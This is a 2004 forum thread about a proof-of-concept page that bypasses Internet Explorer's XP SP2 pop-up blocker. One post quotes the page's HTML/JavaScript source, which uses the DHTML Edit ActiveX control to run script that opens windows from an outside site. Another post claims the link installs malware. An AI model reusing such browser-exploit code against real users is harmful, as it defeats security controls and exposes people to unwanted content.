 Ie Sp2 Protection, Defeated!, another one kick ms |
|
|
|
|
  |
  Dec 23 2004, 01:49 AM
Post
#1
|
|
|
death  Group: Members Posts: 268 Joined: 8-September 04 Member No.: 384  |
someone just show me this one.
if your using xp sp2. visit the link below with your ie, protected with built-in firewall and pop-up blocker and see what happen  http://www.malware.com/flopup.html |
 |
 
|
|
Dec 23 2004, 01:53 AM
Post
#2
|
|
|
Newbie [ Level 1 ] Group: Members Posts: 1 Joined: 23-December 04 Member No.: 1,854 |
I haven't gone to the link, but by the looks of it, it kind of seems as if a virus is going to infect us or something if we go there. I have already rebooted my XP's drivers too may times for me to go to a site where I am just asking for a virus.
|
|
|
|
 Dec 23 2004, 03:05 AM
Post
#3
|
|
|
Newbie [ Level 2 ] Group: Members Posts: 25 Joined: 23-December 04 Member No.: 1,856 |
well this is the source, I will bold the bad stuff.
<body onload="setTimeout(' main() ',1000)"> <object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1" align="middle" > <PARAM NAME="ActivateApplets" VALUE="1"> <PARAM NAME="ActivateActiveXControls" VALUE="1"> </object> <script> // 10.11.04 http://www.editive.com function shellscript() { open("http://www.malware.com/flywin.html","_blank","scrollbar=no"); showModalDialog("http://www.malware.com/flywin.html"); } function main() { x.DOM.Script.execScript(shellscript.toString()); x.DOM.Script.setTimeout("shellscript()"); } </SCRIPT> <br><br><br><br><br><br><center><img src=nocigar.gif><br><br><FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center> That Is why I use FireFOX |
|
|
|
|
Dec 23 2004, 03:48 AM
Post
#4
|
|
|
Way Out Of Control - You need a life :) Group: Members Posts: 1,366 Joined: 14-September 04 From: Nottingham England Member No.: 570 |
Whats meant to happen if you run it with IE... ?
on my Linux system it just says "No cigar" and applauds me.. i take it i passed  is this a bug that wasnt fixed by SP2, and will also affect Sp1... or was it a bug introduced by SP2 ? |
|
|
|
|
Dec 23 2004, 04:29 AM
Post
#5
|
|
|
Super Member Group: Members Posts: 692 Joined: 25-November 04 Member No.: 1,523 |
I get the same thing, No cigar and applause. But then again I am using firefox on my mac.
|
|
|
|
|
Dec 23 2004, 05:55 AM
Post
#6
|
|
|
Member - Active Contributor Group: Members Posts: 77 Joined: 11-December 04 Member No.: 1,704 |
On MSIE these Windows go flying all over you screen and they say "boo".
BTW, I was just testing it, I usally use firefox. |
|
|
|
|
Dec 23 2004, 06:38 AM
Post
#7
|
|
|
Member - Active Contributor Group: Members Posts: 88 Joined: 4-September 04 From: Melbourne, Australia Member No.: 217 |
looking through that script, it seems that it sets a timeout that opens the URL http://www.malware.com/flywin.html every 1000ms (1 second). i haven't actually tested it in IE since i use Opera.
AND if you want to know, activex class id '2D360201-FFF5-11d1-8D03-00A0C959BC0A' (the object used in the script) is the DHTML Edit Control. Microsoft has marked this 'safe for scripting', meaning that internet explorer will run the activex control without even asking you... regardless of the security settings (i think). |
|
|
|
|
Dec 23 2004, 10:09 PM
Post
#8
|
|
|
death Group: Members Posts: 268 Joined: 8-September 04 Member No.: 384 |
it's an activex, and that features is only for ie and it won't work for non-ie browser. the link also install a malware automatically and really kick someones ass when visited that with ie browser.
|
|
|
|
|
Dec 27 2004, 04:05 PM
Post
#9
|
|
|
Super Member Group: Members Posts: 595 Joined: 4-September 04 Member No.: 228 |
Is it just me or is this all to easy to do?
Dammit by just using a right class id you can run scripts even if the user has opted not to do so. Did I misunderstand something or are things this bad with MS? |
|
|
|
|
Similar Topics
|
Lo-Fi Version | Time is now: 20th November 2008 - 10:48 PM |